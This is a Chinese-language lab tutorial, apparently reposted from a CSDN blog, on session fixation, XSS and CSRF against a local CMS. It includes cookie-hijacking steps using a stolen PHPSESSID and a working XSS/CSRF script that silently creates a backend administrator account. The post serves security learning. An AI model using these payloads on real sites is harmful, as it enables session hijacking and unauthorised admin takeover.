ICode9
精准搜索请尝试: 精确搜索
首页
编程语言>
数据库
系统相关
互联网
其他分享
Python
Java
JavaScript
android
PHP
首页 > 其他分享> 文章详细

固定会话与CSRFandXSS

2021-10-18 21:34:40  阅读:137  来源: 互联网

标签:XSS 浏览器 CSRF 网站 用户 会话 cookie 固定 CSRFandXSS


1.固定会话

  • 练习xsspt的使用

使用xsspt来生成语句,并将其插入到可能存在XSS漏洞的地方 

 登录后台查看,

cookie已经拿到 

利用获得的cookie登录

document.cookie = 'username=admin'; 
document.cookie = 'userid=1';
document.cookie = 'PHPSESSID=qq5cdcqqiucfpde740eoghf1p3';

对url进行修改,即可访问网站后台 

  • 详细描述xss原理图

image.png

 XSS主要使用JavaSript 来完成恶意攻击的行为,JS 可以非常灵活的操纵HTML/CSS/浏览器,这就使得XSS 攻击“想象”空间非常大。
XSS 通过将精心构造的代码(JavaScript)注入到网页中,并由浏览器解释运行这段JS 代码,以达到恶意攻击的效果。当用户访问被XSS 脚本注入过的网页,XSS 脚本就会被提取出来,用户浏览器就会解析执行这段代码,也就是说用户被攻击了。
单从上面的图中可以看出,实现一个XSS攻击至少需要三个角色,服务器端、客服端用户、hacker。

  Hacker对Web Sever提供的服务查找XSS注入点,对其注入点注入恶意代码,如注入的存储型XSS,则回存储在数据内,等待用户触发事件执行。

  用户访问被注入XSS攻击的网页,则回自动执行之前Hacker注入在服务器中的XSS漏洞指令,而执行的XSS指令,则会对用的cookie、资料等重要信息进行非法获取,甚至冒充用户身份登录网站,

而XSS来带危害很多,包括但不限于(
  • 盗取各种用户账号
  • 窃取用户Cookie 资料,冒充用户身份进入网站
  • 劫持用户会话执行任意操作
  • 刷流量,执行弹窗广告
  • 传播蠕虫病毒

搜索框、登录框、微博、留言板、聊天室等等收集用户输入的地方,都有可能被注入XSS 代码,都存在遭受XSS 的风险,只要用户的输入没有做严格的过滤,就会被XSS 。

 2.CSRF与XSS漏洞结合,创建网站后台管理员账号

  • 能够创建后台管理员账号

首先确认网站后台内没有用户

<script>
xmlhttp = new XMLHttpRequest();
xmlhttp.open("post","http://192.168.40.137/cms/admin/user.action.php",false);
xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");
xmlhttp.send("act=add&username=Feng&password=root&password2=root&button=%E6%B7%BB%E5%8A%A0%E7%94%A8%E6%88%B7&userid=0");
</script>
Xmlhttp是一种浏览器对象, 可用于模拟http的GET和POST请求
打开,一个post传参,接一个url(此为cms的后台登录界面),false为同步,默认为true(异步)
setRequestHeader方法只是XMLHTTP为添加或修改HTTP头提供的一个接口方法而已, 至于里面的值则是HTTP协议的含义。
XMLHttpRequest.send()方法用于实际发出 HTTP 请求。

 XSS与CSRF结合完成。​​​​

  • 详细描述CSRF漏洞原理图

image.png

CSRF(Cross-site request forgery),中文名称:跨站请求伪造
用户浏览并登录网站A,而网站A则在浏览器生成A的身份凭证Cookie,用户在没有退出A站的情况下,访问B危险网站,则载入恶意代码,向A站发送请求,用户的浏览器则根据B危险网站的代码,期待产生的Cookie的凭证访问A,A不知道本次的请求是用户发出是还是B发出的,但由于是携带用户的Cookie,则A站则根据用户的权限来对请求进行处理。这样B就完成一次CSRF的攻击。
 

标签:XSS,浏览器,CSRF,网站,用户,会话,cookie,固定,CSRFandXSS
来源: https://blog.csdn.net/Feng_Blue_/article/details/120830735

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

关于我们 | 联系我们 | 留言反馈

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有